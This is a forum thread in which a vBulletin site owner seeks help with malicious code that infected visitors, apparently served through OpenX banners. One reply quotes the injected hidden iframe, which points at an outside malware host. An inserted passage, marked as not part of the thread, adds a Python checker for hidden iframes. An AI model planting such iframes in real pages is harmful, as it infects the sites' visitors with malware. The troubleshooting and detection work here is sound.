My site's been hacked..

dutchbb

Well-known member
Ok someone managed to find a leak in our site and inserted malicious code somehow.

Here's a screen of the code inserted:

[Attached screenshot: source.webp]

As you can see it's right after the body tag and right before the yui JS.

I'm using the following scripts:

* vBulletin 3.8.5
* OpenX v2.8.6
* Photopost 7.03
* Reviewpost 5.1
* vBSEO 3.5.2


I've been looking for the leak / code but can't seem to find anything. Any help is appreciated.
 
Can you post a link?
http://forum.dutchbodybuilding.com/ Make sure you have some anti-virus running. The problem is, it seems to pop up irregularly. I'm not sure what to make of it.

OpenX? Have you seen this thread:
http://xenforo.com/community/threads/warning-new-openx-exploit.3641/

Are you using the newest release of OpenX?
I posted in that thread, have been hacked too. But we're running the latest version of OpenX now. I really don't know where these viruses are coming from. I haven't seen any warnings myself, members say they get multiple trojans on their computers whilst browsing the forums...
 
Just got two Java exploits when I checked your site out, and Google's slapped up the warning page first :/
 
> Just got two Java exploits when I checked your site out, and Google's slapped up the warning page first :/

Oh Google warning again too huh :(

I would appreciate if anyone can provide me with the source code of the page with the warning, maybe it shows some clue to the location.
 
> Oh Google warning again too huh :(
>
> I would appreciate if anyone can provide me with the source code of the page with the warning, maybe it shows some clue to the location.

HTML:
<iframe width="2" height="1" frameborder="0" src="http://alsonatural.cz.cc/46vx79bo/counter.php?id=4"></iframe>

I see hell in there. Something, a banner maybe, is injecting the iframe.
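
A check for the kind of iframe quoted above (a near-invisible frame pointing at a host the site does not control), as an added example that is not part of the original thread. The sample markup, the host names and the `MAX_DIM` threshold are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

MAX_DIM = 5  # px (assumed threshold): a frame this small is invisible to visitors

# Constructed sample: injected frame after <body>, before the YUI script, plus
# one normal banner frame and one tiny frame served from the site's own ad host.
SAMPLE = """<html><body>
<iframe width="2" height="1" frameborder="0" src="http://injected.example.invalid/counter.php?id=4"></iframe>
<script src="/clientscript/yui.js"></script>
<iframe width="728" height="90" src="http://ads.forum.example/banner.php"></iframe>
<iframe width="1" height="1" src="http://ads.forum.example/beacon.php"></iframe>
</body></html>"""

def _px(value):
    """Return a width/height attribute as int pixels, or None if absent/not pixels."""
    try:
        return int((value or "").strip().lower().rstrip("px"))
    except ValueError:
        return None

class IframeAudit(HTMLParser):
    """Collect iframes that are both hidden and served from an untrusted host."""

    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted = {h.lower() for h in trusted_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        w, h = _px(a.get("width")), _px(a.get("height"))
        style = a.get("style", "").replace(" ", "").lower()
        tiny = (w is not None and w <= MAX_DIM) or (h is not None and h <= MAX_DIM)
        hidden = tiny or "display:none" in style or "visibility:hidden" in style
        if hidden and host and host not in self.trusted:
            line, _ = self.getpos()
            self.findings.append({"line": line, "host": host, "src": a["src"]})

def find_hidden_iframes(html, trusted_hosts):
    """Return one finding per hidden iframe whose host is not in trusted_hosts."""
    audit = IframeAudit(trusted_hosts)
    audit.feed(html)
    audit.close()
    return audit.findings
```

Because the frame in this thread only appeared intermittently, a check like this needs to run over many saved copies of the page and over the ad server's delivered banner markup, not a single fetch. A frame written into the page by script at view time will not show up in the static source.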
 
Thanks. I can't find that code anywhere though. Not sure where it's located and how it got there :s

One of your banners for sure. Or, and I doubt it, your server got hacked and it's a script working from there.

I'm betting bad advertising ;D

Remove all banners and run some tests, add them back until you find the culprit, or follow the source of each.
 
Banners disabled. Does it persist?

Seriously if it's OpenX again I'll stop using it, that would be the third time it got hacked.
 
> Banners disabled. Does it persist?
>
> Seriously if it's OpenX again I'll stop using it, that would be the third time it got hacked.

It was the top banner I'm guessing, when I checked your site out there was a hidden iframe in the top left hand corner of your website, beside the main banner. Now it's gone and I can access your site, and the code is clean.

Does OpenX act as an ad server rotating banners on your site? (I don't know what OpenX is) It's possible one of the ads was infected and that's why only sometimes your users were affected, when that specific banner ad rotated in.

Adbrite was notorious for that ****, they took on some nasty advertisers for a while there.
 
This is happening to sites using OpenX ads. In fact, a blog used to have OpenX ads, and my antivirus was able to catch it, and I was able to close it before it did anything.

It's not just forums. It's all kinds of sites.

I think it's best just to forget doing business with OpenX, at all.
 
I get the Google warning, and in the warning it says "contains elements from alsonatural.cz.cc" where I'm assuming you might have some images from there, such as in a banner or sig or etc. Your site probably isn't hacked, just the site that I mentioned is bringing up the warnings.
 
> It was the top banner I'm guessing, when I checked your site out there was a hidden iframe in the top left hand corner of your website, beside the main banner. Now it's gone and I can access your site, and the code is clean.
>
> Does OpenX act as an ad server rotating banners on your site? (I don't know what OpenX is) It's possible one of the ads was infected and that's why only sometimes your users were affected, when that specific banner ad rotated in.
>
> Adbrite was notorious for that ****, they took on some nasty advertisers for a while there.

Yes OpenX is an ad server, but these are our own banners or from advertisers we know. I'm going to look in the OpenX files if I can find anything in there.

@Carlos: yeah probably. They just can't seem to get their code secure and everything is up to date. Thanks guys.
 
A site I visit on occasion had a similar problem, but it wasn't related to the ad software

Somehow, malicious iframe code was being inserted into the forum templates.

They were running an older version of VB 3.8
 
> Yes OpenX is an ad server, but these are our own banners or from advertisers we know. I'm going to look in the OpenX files if I can find anything in there.

Because this is obviously extremely important to many, any further detail regarding this would be great.

Was the banner that caused problems hosted on your server?
In your opinion, is there a 'safe' way to use OpenX? For instance, having all banners on the server?

Just curious if you had any further thoughts, I've not used OpenX.
 